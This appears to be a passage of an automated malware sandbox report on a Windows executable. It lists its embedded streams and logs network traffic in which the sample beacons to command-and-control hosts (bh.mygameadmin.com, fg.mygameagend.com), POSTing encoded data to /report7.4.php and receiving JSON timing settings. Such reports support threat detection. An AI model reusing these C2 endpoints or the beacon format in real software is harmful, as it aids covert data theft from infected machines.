                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Stream Size:7196212
                                                                                  Entropy:7.9486797875
                                                                                  Base64 Encoded:True
                                                                                  Stream Path: \x18496\x15167\x17394\x17464\x17841, File Type: data, Stream Size: 3280
                                                                                  General
                                                                                  Stream Path:\x18496\x15167\x17394\x17464\x17841
                                                                                  File Type:data
                                                                                  Stream Size:3280
                                                                                  Entropy:5.27810535323
                                                                                  Base64 Encoded:False
                                                                                  Stream Path: \x18496\x16191\x17783\x17516\x15210\x17892\x18468, File Type: ASCII text, with very long lines, with no line terminators, Stream Size: 29802
                                                                                  General
                                                                                  Stream Path:\x18496\x16191\x17783\x17516\x15210\x17892\x18468
                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                  Stream Size:29802
                                                                                  Entropy:4.69223735488
                                                                                  Base64 Encoded:True
                                                                                  Stream Path: \x18496\x16191\x17783\x17516\x15978\x17586\x18479, File Type: data, Stream Size: 3008
                                                                                  General
                                                                                  Stream Path:\x18496\x16191\x17783\x17516\x15978\x17586\x18479
                                                                                  File Type:data
                                                                                  Stream Size:3008
                                                                                  Entropy:3.52620475136
                                                                                  Base64 Encoded:False
                                                                                  Stream Path: \x18496\x16255\x16740\x16943\x18486, File Type: data, Stream Size: 172
                                                                                  General
                                                                                  Stream Path:\x18496\x16255\x16740\x16943\x18486
                                                                                  File Type:data
                                                                                  Stream Size:172
                                                                                  Entropy:4.83586062657
                                                                                  Base64 Encoded:False
                                                                                  Stream Path: \x18496\x16383\x17380\x16876\x17892\x17580\x18481, File Type: data, Stream Size: 10176
                                                                                  General
                                                                                  Stream Path:\x18496\x16383\x17380\x16876\x17892\x17580\x18481
                                                                                  File Type:data
                                                                                  Stream Size:10176
                                                                                  Entropy:2.8257387661
                                                                                  Base64 Encoded:False
                                                                                  Stream Path: \x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 54
                                                                                  General
                                                                                  Stream Path:\x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                                                                  File Type:data
                                                                                  Stream Size:54
                                                                                  Entropy:3.64425475307
                                                                                  Base64 Encoded:False
                                                                                  Stream Path: \x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 84
                                                                                  General
                                                                                  Stream Path:\x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472
                                                                                  File Type:data
                                                                                  Stream Size:84
                                                                                  Entropy:3.94190859404
                                                                                  Base64 Encoded:False
                                                                                  Stream Path: \x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486, File Type: data, Stream Size: 4
                                                                                  General
                                                                                  Stream Path:\x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486
                                                                                  File Type:data
                                                                                  Stream Size:4
                                                                                  Entropy:1.5
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . .
                                                                                  Data Raw:b2 02 b4 02
                                                                                  Stream Path: \x18496\x16911\x17892\x17784\x18472, File Type: data, Stream Size: 16
                                                                                  General
                                                                                  Stream Path:\x18496\x16911\x17892\x17784\x18472
                                                                                  File Type:data
                                                                                  Stream Size:16
                                                                                  Entropy:2.17742128383
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . .
                                                                                  Data Raw:b2 02 00 00 00 00 00 00 02 80 01 80 b3 02 00 80
                                                                                  Stream Path: \x18496\x16918\x17191\x18468, File Type: MIPSEB Ucode, Stream Size: 12
                                                                                  General
                                                                                  Stream Path:\x18496\x16918\x17191\x18468
                                                                                  File Type:MIPSEB Ucode
                                                                                  Stream Size:12
                                                                                  Entropy:1.25162916739
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . .
                                                                                  Data Raw:01 80 01 80 00 00 00 00 00 00 00 00
                                                                                  Stream Path: \x18496\x17163\x16689\x18229, File Type: data, Stream Size: 4
                                                                                  General
                                                                                  Stream Path:\x18496\x17163\x16689\x18229
                                                                                  File Type:data
                                                                                  Stream Size:4
                                                                                  Entropy:2.0
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . .
                                                                                  Data Raw:ea 02 01 00
                                                                                  Stream Path: \x18496\x17165\x16949\x17894\x17778\x18492, File Type: data, Stream Size: 18
                                                                                  General
                                                                                  Stream Path:\x18496\x17165\x16949\x17894\x17778\x18492
                                                                                  File Type:data
                                                                                  Stream Size:18
                                                                                  Entropy:2.46132014021
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:b3 02 b8 02 ba 02 00 00 b3 02 b3 02 b7 02 b9 02 bb 02
                                                                                  Stream Path: \x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 384
                                                                                  General
                                                                                  Stream Path:\x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                                                                  File Type:data
                                                                                  Stream Size:384
                                                                                  Entropy:4.95816205211
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:= . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:3d 00 6e 00 84 00 83 02 85 02 86 02 87 02 88 02 89 02 8a 02 8b 02 8d 02 8e 02 8f 02 90 02 91 02 92 02 93 02 94 02 96 02 be 02 bf 02 c0 02 c1 02 c2 02 c4 02 c5 02 c6 02 c7 02 c8 02 c9 02 cb 02 cc 02 cd 02 ce 02 cf 02 d0 02 d1 02 d2 02 d3 02 d4 02 d5 02 d6 02 d7 02 d8 02 d9 02 da 02 db 02 dc 02 dd 02 de 02 df 02 e0 02 e1 02 e2 02 e3 02 e4 02 e5 02 e6 02 e7 02 e8 02 e9 02 ec 02 ed 02
                                                                                  Stream Path: \x18496\x17548\x17648\x17522\x17512\x18487, File Type: data, Stream Size: 12
                                                                                  General
                                                                                  Stream Path:\x18496\x17548\x17648\x17522\x17512\x18487
                                                                                  File Type:data
                                                                                  Stream Size:12
                                                                                  Entropy:2.52205520887
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . .
                                                                                  Data Raw:b4 02 b5 02 b3 02 00 80 b6 02 00 00
                                                                                  Stream Path: \x18496\x17558\x17959\x16943\x17180\x17514\x17892\x17784\x18472, File Type: data, Stream Size: 6
                                                                                  General
                                                                                  Stream Path:\x18496\x17558\x17959\x16943\x17180\x17514\x17892\x17784\x18472
                                                                                  File Type:data
                                                                                  Stream Size:6
                                                                                  Entropy:2.25162916739
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . .
                                                                                  Data Raw:ee 02 09 84 ef 02
                                                                                  Stream Path: \x18496\x17753\x17650\x17768\x18231, File Type: data, Stream Size: 60
                                                                                  General
                                                                                  Stream Path:\x18496\x17753\x17650\x17768\x18231
                                                                                  File Type:data
                                                                                  Stream Size:60
                                                                                  Entropy:3.38677863114
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:77 02 98 02 9a 02 9c 02 9e 02 a0 02 a1 02 a3 02 a5 02 a7 02 a9 02 ab 02 ad 02 af 02 b1 02 97 02 99 02 9b 02 9d 02 9f 02 9f 02 a2 02 a4 02 a6 02 a8 02 aa 02 ac 02 ae 02 b0 02 a4 02
                                                                                  Stream Path: \x18496\x17932\x17910\x17458\x16778\x17207\x17522, File Type: data, Stream Size: 16
                                                                                  General
                                                                                  Stream Path:\x18496\x17932\x17910\x17458\x16778\x17207\x17522
                                                                                  File Type:data
                                                                                  Stream Size:16
                                                                                  Entropy:2.90563906223
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . 3 . . . . . . . . . . .
                                                                                  Data Raw:83 02 96 02 33 81 02 8c b3 02 ea 02 bc 02 00 00

                                                                                  Network Behavior

                                                                                  Snort IDS Alerts

                                                                                  Timestamp                 Protocol  SID   Message                                        Source Port  Dest Port  Source IP    Dest IP
                                                                                  10/24/21-12:49:34.014326  UDP       1948  DNS zone transfer UDP                          60785        53         192.168.2.3  34.64.183.91
                                                                                  10/24/21-12:49:42.697753  UDP       1948  DNS zone transfer UDP                          60785        53         192.168.2.3  34.64.183.91
                                                                                  10/24/21-12:49:47.628452  UDP       1948  DNS zone transfer UDP                          60785        53         192.168.2.3  34.64.183.91
                                                                                  10/24/21-12:49:58.425112  UDP       1948  DNS zone transfer UDP                          60785        53         192.168.2.3  34.64.183.91
                                                                                  10/24/21-12:50:06.100895  ICMP      402   ICMP Destination Unreachable Port Unreachable  -            -          192.168.2.3  34.64.183.91
                                                                                  10/24/21-12:50:06.820513  ICMP      402   ICMP Destination Unreachable Port Unreachable  -            -          192.168.2.3  34.64.183.91
                                                                                  10/24/21-12:50:07.902093  ICMP      402   ICMP Destination Unreachable Port Unreachable  -            -          192.168.2.3  34.64.183.91
                                                                                  10/24/21-12:50:09.460402  ICMP      402   ICMP Destination Unreachable Port Unreachable  -            -          192.168.2.3  34.64.183.91
                                                                                  10/24/21-12:50:10.421239  ICMP      402   ICMP Destination Unreachable Port Unreachable  -            -          192.168.2.3  34.64.183.91
                                                                                  10/24/21-12:51:41.901821  UDP       1948  DNS zone transfer UDP                          53947        53         192.168.2.3  34.64.183.91

                                                                                  Network Port Distribution

                                                                                  UDP Packets

                                                                                  Timestamp                             Source Port  Dest Port  Source IP    Dest IP
                                                                                  Oct 24, 2021 12:49:25.744143963 CEST  64021        53         192.168.2.3  8.8.8.8
                                                                                  Oct 24, 2021 12:49:25.744909048 CEST  60784        53         192.168.2.3  8.8.8.8
                                                                                  Oct 24, 2021 12:49:25.765116930 CEST  53           64021      8.8.8.8      192.168.2.3
                                                                                  Oct 24, 2021 12:49:25.769309044 CEST  53           60784      8.8.8.8      192.168.2.3

                                                                                  DNS Queries

                                                                                  Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name               Type            Class
                                                                                  Oct 24, 2021 12:49:25.744143963 CEST  192.168.2.3  8.8.8.8  0x5e85    Standard query (0)  toa.mygametoa.com  A (IP address)  IN (0x0001)
                                                                                  Oct 24, 2021 12:49:25.744909048 CEST  192.168.2.3  8.8.8.8  0xdd65    Standard query (0)  toa.mygametoa.com  28              IN (0x0001)

                                                                                  DNS Answers

                                                                                  Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name               CName  Address       Type            Class
                                                                                  Oct 24, 2021 12:49:25.765116930 CEST  8.8.8.8    192.168.2.3  0x5e85    No error (0)  toa.mygametoa.com  -      34.64.183.91  A (IP address)  IN (0x0001)

                                                                                  HTTP Request Dependency Graph

                                                                                  • bh.mygameadmin.com
                                                                                  • fg.mygameagend.com

                                                                                  HTTPS Proxied Packets

                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                                  0           192.168.2.3  49805        104.21.75.46    443               C:\Windows\System32\svchost.exe
                                                                                  Timestamp                kBytes transferred  Direction  Data
                                                                                  2021-10-24 10:50:06 UTC  0                   OUT        POST /report7.4.php HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
                                                                                  Host: bh.mygameadmin.com
                                                                                  Content-Length: 278
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2021-10-24 10:50:06 UTC0OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 63 33 4e 79 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 61 47 6c 6d 56 74 61 58 75 57 70 74 36 6b 70 70 6d 31 74 62 57 31 70 71 43 6b 70 6d 6c 6f 5a 32 68 37 70 74 36 6b 31 35 4f 67 70 4b 5a 76 6c 4b 62 65 70 4b 62 58 31 4e 61 69 31 39 62 66 6f 74 65 6f 71 61 4b 70 71 61 61 67 70 4b 5a 6a 5a 33 6c 73 62 32 4a 37 62 33 69 6d 33 71 53 6d 71 34 66 66 33 4a 6d 74 6d 71 69 71 31 71 75 71 31 39 61 48 71 4e 79 71 68 39 61 47 31 4b 75 70 6d 39 24 66 6d 71 32 47 68 70 69 6d 6f 4b 53 6d 59 32 70 37 6c 71 62 65 70 4b 62 63 6f 74 40 6d 6f 4b 53 6d 6c 6e 74 39 62 32 56 69 70 74 36 6b 70 72 36 64 70 71 43 6b 70 6d 69 66 6c
                                                                                  Data Ascii: p=kaZ5bGdiYntgb3im3qTc3NygpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaaGlmVtaXuWpt6kppm1tbW1pqCkpmloZ2h7pt6k15OgpKZvlKbepKbX1Nai19bfoteoqaKpqaagpKZjZ3lsb2J7b3im3qSmq4ff3Jmtmqiq1quq19aHqNyqh9aG1Kupm9$fmq2GhpimoKSmY2p7lqbepKbcot@moKSmlnt9b2Vipt6kpr6dpqCkpmifl
                                                                                  2021-10-24 10:50:06 UTC  0                   IN         HTTP/1.1 200 OK
                                                                                  Date: Sun, 24 Oct 2021 10:50:06 GMT
                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jdf50sAmKZd6hLj9ndhfpyKIog6ideF2zxWcBaYKj894GXG0PFqHMV8vHTZYdmXG7Y%2FQZs0GQPAaX2O89bWX2YaOvd8H1CAkVAsqSmhb2pw28sUNeAGhJVPDz95OyfMf1YXMv2Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 6a32a46d09d06958-FRA
                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                  2021-10-24 10:50:06 UTC  1                   IN         Data Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                                                  Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                                                  2021-10-24 10:50:06 UTC  1                   IN         Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                                  1           192.168.2.3  49807        172.67.167.122  443               C:\Windows\System32\svchost.exe
                                                                                  Timestamp                kBytes transferred  Direction  Data
                                                                                  2021-10-24 10:50:06 UTC  1                   OUT        POST /report7.4.php HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
                                                                                  Host: fg.mygameagend.com
                                                                                  Content-Length: 278
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2021-10-24 10:50:06 UTC1OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 63 33 4e 79 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 61 47 6c 6d 56 74 61 58 75 57 70 74 36 6b 70 70 6d 31 74 62 57 31 70 71 43 6b 70 6d 6c 6f 5a 32 68 37 70 74 36 6b 31 35 4f 67 70 4b 5a 76 6c 4b 62 65 70 4b 62 58 31 4e 61 69 31 39 62 66 6f 74 65 6f 71 61 4b 70 71 61 61 67 70 4b 5a 6a 5a 33 6c 73 62 32 4a 37 62 33 69 6d 33 71 53 6d 71 34 66 66 33 4a 6d 74 6d 71 69 71 31 71 75 71 31 39 61 48 71 4e 79 71 68 39 61 47 31 4b 75 70 6d 39 24 66 6d 71 32 47 68 70 69 6d 6f 4b 53 6d 59 32 70 37 6c 71 62 65 70 4b 62 63 6f 74 40 6d 6f 4b 53 6d 6c 6e 74 39 62 32 56 69 70 74 36 6b 70 72 36 64 70 71 43 6b 70 6d 69 66 6c
                                                                                  Data Ascii: p=kaZ5bGdiYntgb3im3qTc3NygpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaaGlmVtaXuWpt6kppm1tbW1pqCkpmloZ2h7pt6k15OgpKZvlKbepKbX1Nai19bfoteoqaKpqaagpKZjZ3lsb2J7b3im3qSmq4ff3Jmtmqiq1quq19aHqNyqh9aG1Kupm9$fmq2GhpimoKSmY2p7lqbepKbcot@moKSmlnt9b2Vipt6kpr6dpqCkpmifl
                                                                                  2021-10-24 10:50:07 UTC  1                   IN         HTTP/1.1 200 OK
                                                                                  Date: Sun, 24 Oct 2021 10:50:07 GMT
                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z6hUjLumL9CnwY4P8w5uIjqoOwpKUS1DgjCVcTv6q4LTeqn2T%2FhuwPLK4yZM81PbWzttV8PlbDYtQQKcoxFizdU5vAxrou1x8DtbL%2FCs8csw%2Fxw9kqeJG6mZZwkJqHkGLQ0Oh3s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 6a32a47199059aaa-FRA
                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                  2021-10-24 10:50:07 UTC  2                   IN         Data Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                                                  Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                                                  2021-10-24 10:50:07 UTC  2                   IN         Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                                  2           192.168.2.3  49808        104.21.75.46    443               C:\Windows\System32\svchost.exe
                                                                                  Timestamp                kBytes transferred  Direction  Data
                                                                                  2021-10-24 10:50:07 UTC  2                   OUT        POST /report7.4.php HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
                                                                                  Host: bh.mygameadmin.com
                                                                                  Content-Length: 278
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2021-10-24 10:50:07 UTC3OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 63 33 4e 79 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 6b 61 61 47 6c 6d 56 74 61 58 75 57 70 74 36 6b 70 70 6d 31 74 62 57 31 70 71 43 6b 70 6d 6c 6f 5a 32 68 37 70 74 36 6b 31 35 4f 67 70 4b 5a 76 6c 4b 62 65 70 4b 62 58 31 4e 61 69 31 39 62 66 6f 74 65 6f 71 61 4b 70 71 61 61 67 70 4b 5a 6a 5a 33 6c 73 62 32 4a 37 62 33 69 6d 33 71 53 6d 71 34 66 66 33 4a 6d 74 6d 71 69 71 31 71 75 71 31 39 61 48 71 4e 79 71 68 39 61 47 31 4b 75 70 6d 39 24 66 6d 71 32 47 68 70 69 6d 6f 4b 53 6d 59 32 70 37 6c 71 62 65 70 4b 62 63 6f 74 40 6d 6f 4b 53 6d 6c 6e 74 39 62 32 56 69 70 74 36 6b 70 72 36 64 70 71 43 6b 70 6d 69 66 6c
                                                                                  Data Ascii: p=kaZ5bGdiYntgb3im3qTc3NygpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6kkaaGlmVtaXuWpt6kppm1tbW1pqCkpmloZ2h7pt6k15OgpKZvlKbepKbX1Nai19bfoteoqaKpqaagpKZjZ3lsb2J7b3im3qSmq4ff3Jmtmqiq1quq19aHqNyqh9aG1Kupm9$fmq2GhpimoKSmY2p7lqbepKbcot@moKSmlnt9b2Vipt6kpr6dpqCkpmifl
                                                                                  2021-10-24 10:50:08 UTC  3                   IN         HTTP/1.1 200 OK
                                                                                  Date: Sun, 24 Oct 2021 10:50:08 GMT
                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uLAFwLXyGPPDeDuTzEAYGTNoP%2BrU2Rqu9VpwcvV%2FJnmPEaI4h5e9piw6UviyVP4NEDEBDeNTDtm0K1P%2FY9sCQY1xYRS6zGI8WpUJuoWo6e6pvRs%2BTJrrA1SSwHLkJkBjCRfy5xY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 6a32a4752cfb074a-FRA
                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                  2021-10-24 10:50:08 UTC  4                   IN         Data Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                                                  Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                                                  2021-10-24 10:50:08 UTC  4                   IN         Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                                  3           192.168.2.3  49811        104.21.75.46    443               C:\Windows\System32\svchost.exe
                                                                                  Timestamp                kBytes transferred  Direction  Data
                                                                                  2021-10-24 10:50:09 UTC  4                   OUT        POST /report7.4.php HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
                                                                                  Host: bh.mygameadmin.com
                                                                                  Content-Length: 558
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2021-10-24 10:50:09 UTC4OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 54 63 33 4e 79 67 70 4b 5a 35 5a 57 74 69 61 4a 61 66 6d 57 56 34 65 36 62 65 70 4b 61 5a 6a 4b 61 67 70 4b 5a 34 5a 32 68 6e 70 74 36 6b 73 5a 47 6d 68 70 5a 6c 62 57 6c 37 6c 71 62 65 70 4b 61 5a 62 4a 5a 6c 59 33 75 6d 6f 4b 53 6d 6d 57 56 6c 59 57 39 37 61 61 62 65 70 4b 61 43 6a 35 6a 54 31 74 53 6f 30 37 35 6d 6e 39 65 55 5a 36 69 43 6c 33 6d 38 69 6d 6d 50 6e 5a 75 31 71 62 35 6a 5a 34 36 66 5a 71 70 74 65 4e 53 66 61 4a 6c 37 61 4c 79 48 6e 59 65 24 6e 35 6d 63 6c 32 6e 57 5a 59 61 74 6e 57 4b 50 71 5a 52 39 6e 32 79 59 6c 34 6d 41 6c 47 43 62 69 32 5a 34 71 34 46 6f 6d 47 4f 61 61 32 6a 66 74 62 36 4c 6d 61 68 37 71 70 65 4c 69 5a 65 46 6a 70 69 70 61 4e 65 38 31 37 65 65 76 71 71 62 6d
                                                                                  Data Ascii: p=kaZ5bGdiYntgb3im3qTc3NygpKZ5ZWtiaJafmWV4e6bepKaZjKagpKZ4Z2hnpt6ksZGmhpZlbWl7lqbepKaZbJZlY3umoKSmmWVlYW97aabepKaCj5jT1tSo075mn9eUZ6iCl3m8immPnZu1qb5jZ46fZqpteNSfaJl7aLyHnYe$n5mcl2nWZYatnWKPqZR9n2yYl4mAlGCbi2Z4q4FomGOaa2jftb6Lmah7qpeLiZeFjpipaNe817eevqqbm
                                                                                  2021-10-24 10:50:09 UTC  5                   IN         HTTP/1.1 200 OK
                                                                                  Date: Sun, 24 Oct 2021 10:50:09 GMT
                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EVQwNj3Kap4FKLvdJMaAtg9Mz9%2FrrG69k9B9uH4wfGH0wqgI%2BrFnZqFfS%2BpV1OEcCq3eMbq5FgqJqwhhZsDyPjerzbvG3%2FTIEcnfCSOxOWrLN5fk37Y%2BMT2OV5FHz0phpySXAbA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 6a32a47f3c4d1756-FRA
                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                  2021-10-24 10:50:09 UTC  5                   IN         Data Raw: 33 33 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 5b 5d 7d 0d 0a
                                                                                  Data Ascii: 33{"host":[],"spacing":1800,"spacing2":120,"data":[]}
                                                                                  2021-10-24 10:50:09 UTC  5                   IN         Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                                                                  4           192.168.2.3  49812        104.21.75.46    443               C:\Windows\System32\svchost.exe
                                                                                  Timestamp                kBytes transferred  Direction  Data
                                                                                  2021-10-24 10:50:09 UTC  5                   OUT        POST /report7.4.php HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
                                                                                  Host: bh.mygameadmin.com
                                                                                  Content-Length: 254
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
